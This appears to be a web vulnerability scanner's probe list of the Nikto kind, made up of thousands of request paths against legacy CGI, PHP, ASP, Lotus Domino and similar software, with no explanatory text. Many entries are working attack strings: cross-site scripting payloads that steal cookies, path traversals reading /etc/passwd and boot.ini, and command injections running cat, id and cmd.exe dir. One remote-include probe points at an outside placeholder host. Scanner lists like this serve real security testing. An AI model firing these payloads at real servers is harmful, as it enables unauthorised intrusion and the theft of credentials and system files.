sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/iecreate.stm?template=../
sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/ieedit.stm?url=../
sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
tablebuild.pl
talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
tar/
tarjetas/
tcb/files/auth/r/root
tcsh
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd
technote/print.cgi
temp/
template/
templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
temporal/
test
test-cgi.bat
test-cgi.exe?<script>alert(document.cookie)</script>
test-cgi.tcl
test-cgi?/*
test-env
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
test.cgi
test.htm
test.html
test.nsf
test.php
test.php%20
test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
test.txt
test/
test/info.php
test/jsp/Language.jsp
test/jsp/buffer1.jsp
test/jsp/buffer2.jsp
test/jsp/buffer3.jsp
test/jsp/buffer4.jsp
test/jsp/declaration/IntegerOverflow.jsp
test/jsp/extends1.jsp
test/jsp/extends2.jsp
test/jsp/pageAutoFlush.jsp
test/jsp/pageDouble.jsp
test/jsp/pageExtends.jsp
test/jsp/pageImport2.jsp
test/jsp/pageInfo.jsp
test/jsp/pageInvalid.jsp
test/jsp/pageIsErrorPage.jsp
test/jsp/pageIsThreadSafe.jsp
test/jsp/pageSession.jsp
test/phpinfo.php
test/realPath.jsp
test/test.cgi
testcgi.exe
testcgi.exe?<script>alert(document.cookie)</script>
testing/
tests/
texis.exe/?-dump
texis.exe/?-version
texis.exe/junk
texis/junk
texis/phine
texis/websearch/phine
textcounter.pl
thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session
theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session
theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
ticket.php?id=99999
tidfinder.cgi
tigvote.cgi
tinymsg.php
title.cgi
tmp/
tmp_view.php?file=/etc/passwd
today.nsf
tomcat-docs/index.html
tools/
topic/entete.php
topsitesdir/edit.php
tpgnrock
tpv/
trabajo/
trace.axd
traffic.cgi?cfg=../../../../../../../../etc/passwd
trafficlog/
transito/
tree
tree/
trees/
troops.cgi
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
tsweb/
ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
ttawebtop.cgi/?action=start&pg=../../../../../../../../../../passwd
ttforum/index.php
ttp://127.0.0.1:2301/
tutos/file/file_new.php
tutos/file/file_select.php
tvcs/getservers.exe?action=selects1
typo3/typo3/dev/translations.php
typo3conf/
typo3conf/database.sql
typo3conf/localconf.php
uifc/MultFileUploadHandler.php+
ultraboard.cgi
ultraboard.pl
unlg1.1
unlg1.2
upd/
update.dpgs
updates/
upload.asp
upload.cgi
upload.cgi+
upload.php?type=\"<script>alert(document.cookie)</script>
uploader.php
uploadn.asp
uploadx.asp
uptime
url.jsp
urlcount.cgi?%3CIMG%20
urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
usage/
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com
user.php?op=userinfo&uname=<script>alert('hi');</script>
user/
useraction.php3
usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
userinfo.php?uid=1;
userlog.php
userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd
userreg.nsf
users.lst
users.nsf
users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
users/
users/scripts/submit.cgi
ustats/
ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc
ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
usuario/
usuarios/
utils/sprc.asp
utils/sprc.asp+
utm/admin
utm/utm_stat
vars.inc+
vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
vc30/
vchat/msg.txt
vfs/
vgn/ac/data
vgn/ac/delete
vgn/ac/edit
vgn/ac/esave
vgn/ac/fsave
vgn/ac/index
vgn/asp/MetaDataUpdate
vgn/asp/previewer
vgn/asp/status
vgn/asp/style
vgn/errors
vgn/jsp/controller
vgn/jsp/errorpage
vgn/jsp/initialize
vgn/jsp/jspstatus
vgn/jsp/jspstatus56
vgn/jsp/metadataupdate
vgn/jsp/previewer
vgn/jsp/style
vgn/legacy/edit
vgn/legacy/save
vgn/license
vgn/login
vgn/login/1,501,,00.html?cookieName=x--\>
vgn/performance/TMT
vgn/performance/TMT/Report
vgn/performance/TMT/Report/XML
vgn/performance/TMT/reset
vgn/ppstats
vgn/previewer
vgn/record/previewer
vgn/style
vgn/stylepreviewer
vgn/vr/Deleting
vgn/vr/Editing
vgn/vr/Saving
vgn/vr/Select
vider.php3
view-source
view-source?view-source
view_item?HTML_FILE=../../../../../../../../../../etc
view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
view_source.jsp
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script>
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
viewlogs.pl
viewpage.php?file=/etc/passwd
viewsource?/etc/passwd
viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
viralator.cgi
virgil.cgi
visadmin.exe
visitor.exe
vote.cgi
vpasswd.cgi
vpuserinfo.nsf
vq/demos/respond.pl?<script>alert('Vulnerable')</script>
vq/demos/respond.pl?<script>alert('XSS')</script>
w-agora/
w3-msql
w3-sql
w3perl/admin
wa.exe
wais.pl
warez/
way-board.cgi?db=/etc/passwd%00
way-board/way-board.cgi?db=/etc/passwd%00
wbboard/profile.php
wbboard/reply.php
wconsole.dll
web-console/ServerInfo.jsp%00
web.config
web.nsf
web/
web800fo/
webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif
webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif
web_app/WEB-INF/webapp.properties
webaccess.htm
webaccess/access-options.txt
webadmin.nsf
webadmin/
webais
webalizer/
webamil/test.php
webamil/test.php?mode=phpinfo
webapp/admin/_pages/_bc4jadmin/
webbbs.cgi
webbbs.exe
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
webboard/
webcache/
webcache/webcache.xml
webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd
webcalendar/login.php
webcalendar/view_m.php
webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
webcart-lite/
webcart-lite/config/import.txt
webcart-lite/orders/import.txt
webcart/
webcart/carts/
webcart/config/
webcart/config/clients.txt
webcart/orders/
webcart/orders/import.txt
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>
webdata/
webdav/index.html
webdist.cgi?distloc=;cat%20/etc/passwd
webdriver
webfind.exe?keywords=01234567890123456789
webgais
webif.cgi
weblog/
weblogic
weblogs/
webmail/
webmail/blank.html
webmail/horde/test.php
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
webmail/lib/emailreader_execute_on_each_page.inc.php
webmail/src/read_body.php
webmap.cgi
webmaster_logs/
webnews.pl
webplus.exe?about
webplus?about
webplus?script=../../../../../../../../../../etc
webplus?script=../../../../../../../../../../etc/passwd
websendmail
website/
webspirs.cgi?sp.nextform=../../../../../../../../../../etc
webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
webstats/
webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
webtop/wdk/
webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
webtop/wdk/samples/index.jsp
webuser.nsf
webutil.pl
webutils.pl
webwho.pl
welcome.nsf
wguest.exe
whatever.htr
whateverJUNK(4).html
where.pl?sd=ls%20/etc
whois.cgi?action=load&whois=%3Bid
whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
wikihome/action/conflict.php
windmail
windmail.exe
windows/
wksinst.nsf
word/
work/
wrap
wrap.cgi
ws_ftp.ini
wstats/
wusage/
www-sql
www-sql/
www/
wwwadmin.pl
wwwboard.cgi.cgi
wwwboard.pl
wwwboard/passwd.txt
wwwboard/wwwboard.cgi
wwwboard/wwwboard.pl
wwwjoin/
wwwlog/
wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
wwwstats.html
wwwstats.pl
wwwstats/
wwwthreads/3tvars.pm
wwwthreads/w3tvars.pm
wwwwais
wx/s.dll?d=/boot.ini
x_stat_admin.php
xdk/
xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USERS
yabbse/Reminder.php
yabbse/Sources/Packages.php
z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
zentrack/index.php
zipfiles/
zml.cgi?file=../../../../../../../../../../etc
zml.cgi?file=../../../../../../../../../../etc/passwd%00
zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
zsh
~/<script>alert('Vulnerable')</script>.asp
~/<script>alert('Vulnerable')</script>.aspx
~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null
~nobody/etc/passwd
TiVoConnect?Command=QueryServer
TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
cgi-bin/cart32.exe
cgi-bin/classified.cgi
cgi-bin/download.cgi
cgi-bin/flexform.cgi
cgi-bin/flexform
cgi-bin/lwgate.cgi
cgi-bin/LWGate.cgi
cgi-bin/lwgate
cgi-bin/LWGate
cgi-bin/perlshop.cgi
cfappman/index.cfm
cfdocs/examples/cvbeans/beaninfo.cfm
cfdocs/examples/parks/detail.cfm
kboard/
lists/admin/
splashAdmin.php
ssdefs/
sshome/
tiki/
tiki/tiki-install.php
scripts/samples/details.idc
_vti_bin/shtml.exe
cgi-bin/handler.cgi
cgi-bin/finger
cgi-bin/finger.pl
cgi-bin/formmail.cgi
cgi-bin/formmail.pl
cgi-bin/formmail
cgi-bin/get32.exe
cgi-bin/gm-authors.cgi
cgi-bin/guestbook/passwd
cgi-bin/horde/test.php?mode=phpinfo
cgi-bin/photo/protected/manage.cgi
cgi-bin/wrap.cgi
./
~root/
cgi-bin/wrap
forums/@ADMINconfig.php
forums/config.php
ganglia/
guestbook/guestbookdat
guestbook/pwd
help/
hola/admin/cms/htmltags.php?datei=./sec/data.php
horde/imp/test.php
horde/test.php?mode=phpinfo
imp/horde/test.php?mode=phpinfo
imp/horde/test.php
index.html.bak
index.html~
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
global.inc
cgi-bin/horde/test.php
inc/common.load.php
inc/config.php
inc/dbase.php
cgi-bin/visadmin.exe
cgi-bin/html2chtml.cgi
cgi-bin/html2wml.cgi
cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
cgi-bin/echo.bat?&dir+c:\
cgi-bin/excite;IFS=\"$\";/bin/cat
cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
cgi-bin/guestbook.cgi
cgi-bin/guestbook.pl
cgi-bin/ss
forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\"
guestbook/guestbook.html
html/cgi-bin/cgicso?query=AAA
geeklog/users.php
gb/index.php?login=true
guestbook/admin.php
cgi-bin/gH.cgi
cgi-bin/gm-cplog.cgi
getaccess
help.html
cgi-bin/gm.cgi
filemanager/filemanager_forms.php
cgi-bin/AT-admin.cgi
cgi-bin/auth_data/auth_user_file.txt
cgi-bin/awstats.pl
cgi-bin/awstats/awstats.pl
cgi-bin/blog/mt.cfg
cgi-bin/cart.pl?db='
cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
cgi-bin/mt-static/mt-check.cgi
cgi-bin/mt/mt-check.cgi
cfdocs/expeval/openfile.cfm
index.php/123
mambo/index.php?Itemid=JUNK(5)
profile.php?u=JUNK(8)
ticket.php?id=99999
vgn/login/1,501,,00.html?cookieName=x--\>
a%5c.aspx
cgi-bin/banner.cgi
cgi-bin/bannereditor.cgi
cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
admin/browse.asp?FilePath=c:\&Opt=2&level=0
cgi-bin/architext_query.pl
cgi-bin/bizdb1-search.cgi
cgi-bin/blog/
tsweb/
cgi-bin/blog/mt-load.cgi
cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
vgn/performance/TMT
vgn/performance/TMT/Report
vgn/performance/TMT/Report/XML
vgn/performance/TMT/reset
vgn/ppstats
vgn/previewer
vgn/record/previewer
vgn/stylepreviewer
vgn/vr/Deleting
vgn/vr/Editing
vgn/vr/Saving
vgn/vr/Select
scripts/iisadmin/bdir.htr
scripts/iisadmin/ism.dll
scripts/tools/ctss.idc
bigconf.cgi
billing/billing.apw
blah_badfile.shtml
blah-whatever-badfile.jsp
vgn/style
scripts/no-such-file.pl
SiteServer/Admin/commerce/foundation/domain.asp
SiteServer/Admin/commerce/foundation/driver.asp
SiteServer/Admin/commerce/foundation/DSN.asp
SiteServer/admin/findvserver.asp
SiteServer/Admin/knowledge/dsmgr/default.asp
cgi-bin/cgiwrap/%3Cfont%20color=red%3E
cgi-bin/moin.cgi?test
autologon.html?10514
basilix/mbox-list.php3
basilix/message-read.php3
clusterframe.jsp
IlohaMail/blank.html
bb-dnbd/faxsurvey
cartcart.cgi
scripts/Carello/Carello.dll
scripts/tools/dsnform.exe
scripts/tools/dsnform
SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
prd.i/pgen/
readme.eml
scripts/httpodbc.dll
scripts/proxy/w3proxy.dll
scripts/root.exe?/c+dir+c:\+/OG
SiteServer/admin/
siteseed/
scripts/samples/search/author.idq
scripts/samples/search/filesize.idq
scripts/samples/search/filetime.idq
scripts/samples/search/queryhit.idq
scripts/samples/search/simple.idq
pccsmysqladm/incs/dbconnect.inc
iisadmin/
password.inc
PDG_Cart/oder.log
web-console/ServerInfo.jsp%00
global.asa
exchange/lib/AMPROPS.INC
exchange/lib/DELETE.INC
exchange/lib/GETREND.INC
exchange/lib/GETWHEN.INC
exchange/lib/JSATTACH.INC
exchange/lib/JSROOT.INC
exchange/lib/JSUTIL.INC
exchange/lib/LANG.INC
exchange/lib/logon.inc
exchange/lib/PAGEUTIL.INC
exchange/lib/PUBFLD.INC
exchange/lib/RENDER.INC
exchange/lib/SESSION.INC
ows/restricted%2eshow
WEB-INF./web.xml
view_source.jsp
w-agora/
vider.php3
exchange/root.asp?acs=anon
officescan/cgi/cgiChkMasterPwd.exe
%NETHOOD%/
cgi-bin/astrocam.cgi
cgi-bin/badmin.cgi
cgi-bin/boozt/admin/index.cgi?section=5&input=1
cgi-bin/ezadmin.cgi
cgi-bin/ezboard.cgi
cgi-bin/ezman.cgi
cgi-bin/foxweb.dll
cgi-bin/foxweb.exe
cgi-bin/mgrqcgi
cgi-bin/wconsole.dll
cgi-bin/webplus.exe?about
pbserver/pbserver.dll
administrator/gallery/uploadimage.php
pafiledb/includes/team/file.php
phpEventCalendar/file_upload.php
servlet/com.unify.servletexec.UploadServlet
cgi-win/uploader.exe
scripts/cpshost.dll
scripts/repost.asp
upload.asp
uploadn.asp
uploadx.asp
wa.exe
basilix/compose-attach.php3
server/
cgi-bin/fpsrvadm.exe
siteminder/smadmin.html
vgn/ac/data
vgn/ac/delete
vgn/ac/edit
vgn/ac/esave
vgn/ac/fsave
vgn/ac/index
vgn/asp/MetaDataUpdate
vgn/asp/previewer
vgn/asp/status
vgn/asp/style
vgn/errors
vgn/jsp/controller
vgn/jsp/errorpage
vgn/jsp/initialize
vgn/jsp/jspstatus
vgn/jsp/jspstatus56
vgn/jsp/metadataupdate
vgn/jsp/previewer
vgn/jsp/style
vgn/legacy/edit
vgn/login
webtop/wdk/samples/index.jsp
cgi-bin/.cobalt
WEB-INF/web.xml
forum/admin/wwforum.mdb
fpdb/shop.mdb
guestbook/admin/o12guest.mdb
midicart.mdb
MIDICART/midicart.mdb
mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
news/news.mdb
newuser?Image=../../database/rbsserv.mdb
shopdbtest.asp
shopping300.mdb
shopping400.mdb
shoppingdirectory/midicart.mdb
SilverStream/Meta/Tables/?access-mode=text
database/db2000.mdb
cgi-bin/mailit.pl
cgi-bin/search
doc/webmin.config.notes
error/HTTP_NOT_FOUND.html.var
oem_webstage/cgi-bin/oemapp_cgi
ADMINconfig.php
cgi-bin/.access
cgi-bin/%2e%2e/abyss.conf
cgi-bin/data/fetch.php?page=
cgi-bin/empower?DB=whateverwhatever
cgi-bin/mrtg.cgi?cfg=blah
cgi-bin/store/agora.cgi?page=whatever33.html
?mod=node&nid=some_thing&op=view
?mod=some_thing&op=browse
article.php?article=4965&post=1111111111
blah123.php
categorie.php3?cid=june
CFIDE/probe.cfm
contents.php?new_language=elvish&mode=select
download.php?op=viewdownload
examples/basic/servlet/HelloServlet
home.php?arsc_language=elvish
hostadmin/?page='
index.php?file=index.php
jgb_eng_php3/cfooter.php3
JUNK(5).csp
modules.php?name=Downloads&d_op=viewdownload
modules.php?op=modload&name=0&file=0
modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=
modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
path/nw/article.php?id='
pw/storemgr.pw
rtm.log
scozbook/view.php?PG=whatever
servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
shopa_sessionlist.asp
simplebbs/users/users.php
sips/sipssys/users/a/admin/user
tcb/files/auth/r/root
typo3conf/
typo3conf/database.sql
typo3conf/localconf.php
vchat/msg.txt
vgn/license
web.config
webamil/test.php?mode=phpinfo
webcart-lite/config/import.txt
webcart-lite/orders/import.txt
webcart/carts/
webcart/config/
webcart/config/clients.txt
webcart/orders/
webcart/orders/import.txt
webmail/horde/test.php
whateverJUNK(4).html
ws_ftp.ini
WS_FTP.ini
cgi-bin/MsmMask.exe
_mem_bin/auoconfig.asp
_mem_bin/remind.asp
exchange/lib/ATTACH.INC
SiteServer/Admin/knowledge/persmbr/vs.asp
SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
trace.axd
tvcs/getservers.exe?action=selects1
whatever.htr
nsn/fdir.bas:ShowVolume
nsn/fdir.bas
servlet/webacc?User.html=noexist
forum/admin/database/wwForum.mdb
webmail/blank.html
jamdb/
cgi/cgiproc?
cgi-bin/addbanner.cgi
cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
cgi-bin/shtml.dll
admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
cgi-bin/aglimpse.cgi
cgi-bin/aglimpse
cgi-bin/architext_query.cgi
cgi-local/cgiemail-1.4/cgicso?query=AAA
cgi-local/cgiemail-1.6/cgicso?query=AAA
servlet/SchedulerTransfer
servlet/sunexamples.BBoardServlet
servlets/SchedulerTransfer
cgi-bin/cmd.exe?/c+dir
cgi-bin/cmd1.exe?/c+dir
cgi-bin/hello.bat?&dir+c:\
cgi-bin/post32.exe|dir%20c:\
perl/-e%20print%20Hello
admin.cgi
interscan/
vgn/legacy/save
IDSWebApp/IDSjsp/Login.jsp
quikstore.cfg
quikstore.cgi
securecontrolpanel/
siteminder
webmail/
Xcelerate/LoginPage.html
_cti_pvt/
smg_Smxcfg30.exe?vcc=3560121183d3
examples/servlets/index.html
nsn/..%5Cutil/attrib.bas
nsn/..%5Cutil/chkvol.bas
nsn/..%5Cutil/copy.bas
nsn/..%5Cutil/del.bas
nsn/..%5Cutil/dir.bas
nsn/..%5Cutil/dsbrowse.bas
nsn/..%5Cutil/glist.bas
nsn/..%5Cutil/lancard.bas
nsn/..%5Cutil/md.bas
nsn/..%5Cutil/rd.bas
nsn/..%5Cutil/ren.bas
nsn/..%5Cutil/send.bas
nsn/..%5Cutil/set.bas
nsn/..%5Cutil/slist.bas
nsn/..%5Cutil/type.bas
nsn/..%5Cutil/userlist.bas
nsn/..%5Cweb/env.bas
nsn/..%5Cweb/fdir.bas
nsn/..%5Cwebdemo/env.bas
nsn/..%5Cwebdemo/fdir.bas
wikihome/action/conflict.php
cgi-bin/archie
cgi-bin/calendar.pl
cgi-bin/calendar
cgi-bin/date
cgi-bin/fortune
cgi-bin/redirect
cgi-bin/uptime
cgi-bin/wais.pl
/
webtop/wdk/
SilverStream
signon
upd/
examples/jsp/source.jsp??
lpt9
cfcache.map
cfdocs/cfcache.map
CVS/Entries
lpt9.xtp
mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc
asp/sqlqhit.asp
asp/SQLQHit.asp
iissamples/issamples/sqlqhit.asp
iissamples/issamples/SQLQHit.asp
ISSamples/sqlqhit.asp
ISSamples/SQLQHit.asp
junk.aspx
oc/Search/sqlqhit.asp
oc/Search/SQLQHit.asp
search/htx/sqlqhit.asp
search/htx/SQLQHit.asp
search/sqlqhit.asp
search/SQLQHit.asp
sqlqhit.asp
SQLQHit.asp
cgi-bin/com5...................................................................................................................................................................................................
cgi-bin/com5.java
cgi-bin/com5.pl
?Open
?OpenServer
catalog.nsf
cersvr.nsf
cgi-bin/testing_whatever
domlog.nsf
events4.nsf
log.nsf
names.nsf
LOGIN.PWD
USER/CONFIG.AP
cgi-bin/mail
cgi-bin/nph-error.pl
cgi-bin/post-query
cgi-bin/query
cgi-bin/test-cgi.tcl
cgi-bin/test-env
.perf
admin-serv/config/admpw
test.php%20
*.*
cgi-bin/cgi_process
ht_root/wwwroot/-/local/httpd$map.conf
JUNK(10)
local/httpd$map.conf
tree
cgi-bin/index.js0x70
%00/
%2e/
%2f/
%5c/
index.jsp%00x
weblogic
%a%s%p%d
index.html%20
852566C90012664F
hidden.nsf
mail.box
open?
setup.nsf
statrep.nsf
webadmin.nsf
cgi-bin/cgitest.exe
examples/servlet/AUX
cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
cfdocs/cfmlsyntaxcheck.cfm
Config1.htm
contents/extensions/asp/1
WebAdmin.dll?View=Logon
cgi-bin/Pbcgi.exe
cgi-bin/testcgi.exe
cgi-win/cgitest.exe
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
c/winnt/system32/cmd.exe?/c+dir+/OG
cgi-bin/snorkerz.bat
cgi-bin/snorkerz.cmd
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
msadc/samples/adctest.asp
nikto.ida
SUNWmc/htdocs/
cgi-bin/webfind.exe?keywords=01234567890123456789
cgi-shl/win-c-sample.exe
examples/servlet/TroubleShooter
cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
goform/CheckLogin?login=root&password=tslinux
[SecCheck]/..%2f../ext.ini
[SecCheck]/..%255c..%255c../ext.ini
[SecCheck]/..%252f..%252f../ext.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
.nsf/../winnt/win.ini
prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
................../config.sys
cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini
cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini
netget?sid=user&msg=300&file=../../../../../../../../../boot.ini
netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd
php/php.exe?c:\winnt\boot.ini
phpping/index.php?pingto=www.test.com%20|%20dir%20c:\
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini
wx/s.dll?d=/boot.ini
cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
